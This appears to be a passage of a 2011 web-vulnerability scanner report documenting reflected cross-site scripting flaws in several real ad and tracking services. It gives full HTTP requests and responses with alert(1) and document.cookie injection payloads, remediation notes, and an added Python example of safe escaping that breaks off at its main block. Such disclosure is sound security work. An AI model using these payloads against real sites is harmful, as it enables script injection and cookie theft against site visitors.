GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=lff622'-alert(1)-'d54c1daec2b&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:44:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
href=\"http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3aa6/f/20d/%2a/b%3B234117088%3B0-0%3B0%3B57436492%3B4252-336/280%3B40303346/40321133/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=lff622'-alert(1)-'d54c1daec2b&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cu
...[SNIP]...

4.15. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [mfg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/oiq.man.homeappliance/

Issue detail

The value of the mfg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54760'-alert(1)-'16463c601ed was submitted in the mfg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/oiq.man.homeappliance/;mfg=145;tile=1;sz=720x90,728x90;ord=1296942753;u=mfg_145%7Csid_54760'-alert(1)-'16463c601ed HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 05 Feb 2011 22:27:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 368

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa5/0/0/%2a/e;227869739;0-0;0;41185174;3454-728/90;37969501/37987258/1;u=mfg_145|sid_54760'-alert(1)-'16463c601ed;~sscs=%3fhttp://owneriq.com/advertisers?src=728x90_blue">
...[SNIP]...

4.16. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/oiq.man.homeappliance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e06e3'-alert(1)-'618b2b40360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/oiq.man.homeappliance/;tile=1;sz=720x90,728x90;ord=1296942794;u=sid_&e06e3'-alert(1)-'618b2b40360=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 05 Feb 2011 22:26:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 363

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa5/0/0/%2a/e;227869739;0-0;0;41185174;3454-728/90;37969501/37987258/1;u=sid_&e06e3'-alert(1)-'618b2b40360=1;~sscs=%3fhttp://owneriq.com/advertisers?src=728x90_blue">
...[SNIP]...

4.17. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/oiq.man.homeappliance/

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19620'-alert(1)-'d06efb22ec was submitted in the tile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/oiq.man.homeappliance/;tile=1;sz=720x90,728x90;ord=1296942794;u=sid_19620'-alert(1)-'d06efb22ec HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 05 Feb 2011 22:25:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 359

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa5/0/0/%2a/e;227869739;0-0;0;41185174;3454-728/90;37969501/37987258/1;u=sid_19620'-alert(1)-'d06efb22ec;~sscs=%3fhttp://owneriq.com/advertisers?src=728x90_blue">
...[SNIP]...

4.18. http://appcdn.wibiya.com/Handlers/newsticker.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://appcdn.wibiya.com
Path:   /Handlers/newsticker.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 270ed<script>alert(1)</script>529ef0f2bb5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Handlers/newsticker.php?callback=jsonp_2715064_0270ed<script>alert(1)</script>529ef0f2bb5&url=http%3A//www.kledy.de/rss_dts.php HTTP/1.1
Host: appcdn.wibiya.com
Proxy-Connection: keep-alive
Referer: http://www.kledy.de/bookmarks.php?18fe2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef67307aec5=1
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1286380163-1295459907704

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Sat, 05 Feb 2011 23:08:34 GMT
Expires: Sun, 06 Feb 2011 00:08:34 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.4 with Suhosin-Patch
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.6-3ubuntu4.4
Content-Length: 51609

jsonp_2715064_0270ed<script>alert(1)</script>529ef0f2bb5({"name":"Kledy.de | Aktuelle News","posts":[{"title":"Lottozahlen vom Samstag (05.02.2011)","description":" In der Samstags-Ausspielung von &#34;6 aus 49&#34; des Deutschen Lotto- und Totoblocks wurde
...[SNIP]...

4.19. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 115a8<script>alert(1)</script>512fdd36cd3 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction115a8<script>alert(1)</script>512fdd36cd3&n=ar_int_p68511049&1296999647490 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296999600%2E136%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 13:40:10 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction115a8<script>alert(1)</script>512fdd36cd3("");

4.20. http://baselinemag.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://baselinemag.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3edca%3balert(1)//64bba91453a was submitted in the jscallback parameter. This input was echoed as 3edca;alert(1)//64bba91453a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110206132315&adid=401622%2C401622%2C401622&cc=us&di=29166142%2C28321520%2C28321702&hk=1&ipid=12630&mh=167defd4b82c3759d8e6179eb5de4354&pid=2%2C2%2C2&pvm=b60133d74d36fa666d2419a757f62f74&pvu=F09FDD7F3F444C1FA642829D016326B5&rcc=us&so=0&syid=0%2C0%2C0&uf=0%2C0%2C0&ur=0%2C0%2C0&kp=328%2C930%3B336%2C984%3B245%2C1284%3B&prf=ll%3A1385%7Cintl%3A1992%7Cpreprochrome%3A6%7Cgetconchrome%3A27%7Cadvint%3A2035%7Cadvl%3A2035%7Ctl%3A2151&jscallback=$iTXT.js.callback13edca%3balert(1)//64bba91453a HTTP/1.1
Host: baselinemag.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:23:40 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Sun, 06 Feb 2011 13:23:40 GMT
Connection: close

try{$iTXT.js.callback13edca;alert(1)//64bba91453a();}catch(e){}

4.21. http://baselinemag.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://baselinemag.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91531'-alert(1)-'750bcc2e0e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=12630&91531'-alert(1)-'750bcc2e0e0=1 HTTP/1.1
Host: baselinemag.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gQAAAEt99ts1wA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJhIgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:30 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJhIgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:30 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 13:21:29 GMT
Content-Length: 10716

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
qoptions={tags:"1480.3017.12630"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://baselinemag.us.intellitxt.com';$iTXT.js.pageQuery='ipid=12630&91531'-alert(1)-'750bcc2e0e0=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

4.22. http://baselinemag.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://baselinemag.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 19f15%3balert(1)//734f2337570 was submitted in the jscallback parameter. This input was echoed as 19f15;alert(1)//734f2337570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1296998594508&pagecl=48119&fv=10&muid=&refurl=http%3A%2F%2Fwww.baselinemag.com%2Fc%2Fa%2FIT-Management%2FMacys-Ramps-Up-Online-Operations-637464%2F&ipid=12630&jscallback=$iTXT.js.callback019f15%3balert(1)//734f2337570 HTTP/1.1
Host: baselinemag.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 13:22:54 GMT
Connection: close
Content-Length: 12169

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback019f15;alert(1)//734f2337570({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

4.23. http://baselinemag.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://baselinemag.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa9e1"-alert(1)-"d53ef40e92d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1296998594508&pagecl=48119&fv=10&muid=&refurl=http%3A%2F%2Fwww.baselinemag.com%2Fc%2Fa%2FIT-Management%2FMacys-Ramps-Up-Online-Operations-637464%2F&ipid=12630&jscallback=$iTXT.js.callback0&aa9e1"-alert(1)-"d53ef40e92d=1 HTTP/1.1
Host: baselinemag.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 13:22:55 GMT
Content-Length: 12150

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
4508","dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13","REGIONNAME":"Texas","muid":"","aa9e1"-alert(1)-"d53ef40e92d":"1","city":"Dallas","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/","rcc":"us","cc":"us"},null,60);var un
...[SNIP]...
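The break-out above works because the parameter name is pasted between the two double quotes of a key in a JavaScript object literal: the first injected quote closes the key, `-alert(1)-` is then evaluated as an expression, and the second quote reopens a string so the rest still parses. The following is an added example, not code from this report or from the intellitxt service, that builds the same fragment naively beside a version that serialises every user-controlled string through a JSON encoder, and includes a small scanner that reports where the string literal actually ends. The object shape and the function names are assumptions; the payload is the one from the request above.

```python
import json

# Payload exactly as the scanner submitted it in the parameter name (constructed
# from the request above).
PAYLOAD = 'aa9e1"-alert(1)-"d53ef40e92d'


def render_vulnerable(key, value):
    """Naive concatenation, which is what the reflected response implies the
    server does: the raw parameter name lands between two double quotes."""
    return '{"%s":"%s"}' % (key, value)


def js_string_literal(value):
    """Serialise a Python str as a JavaScript double-quoted string literal.

    json.dumps backslash-escapes " and \\ (the right thing in a JS string
    context) and, with the default ensure_ascii=True, also escapes U+2028 and
    U+2029, which would otherwise end a JS line.  < > & are escaped on top so
    the literal can never close an inline <script> block."""
    s = json.dumps(value)
    return s.replace('<', '\\u003c').replace('>', '\\u003e').replace('&', '\\u0026')


def render_safe(key, value):
    """Same object literal, every user-controlled string emitted via the encoder."""
    return '{%s:%s}' % (js_string_literal(key), js_string_literal(value))


def read_string_literal(js, start):
    """Read a double-quoted JS string literal beginning at js[start].

    Returns (decoded value, index just past the closing quote).  A deliberately
    small scanner that honours backslash escapes the way a JS parser does; it is
    enough to show where the literal really ends."""
    if js[start] != '"':
        raise ValueError('not at a string literal')
    i, out = start + 1, []
    while i < len(js):
        c = js[i]
        if c == '\\':
            nxt = js[i + 1]
            if nxt == 'u':
                out.append(chr(int(js[i + 2:i + 6], 16)))
                i += 6
            else:
                out.append({'n': '\n', 'r': '\r', 't': '\t'}.get(nxt, nxt))
                i += 2
        elif c == '"':
            return ''.join(out), i + 1
        else:
            out.append(c)
            i += 1
    raise ValueError('unterminated string literal')


def first_key(js):
    """The first object key as a JS parser would read it."""
    return read_string_literal(js, js.index('"'))[0]


def code_after_first_key(js):
    """Whatever follows the first key's closing quote.  In the vulnerable
    rendering this is the injected expression, sitting outside any string."""
    _, end = read_string_literal(js, js.index('"'))
    return js[end:]


if __name__ == '__main__':
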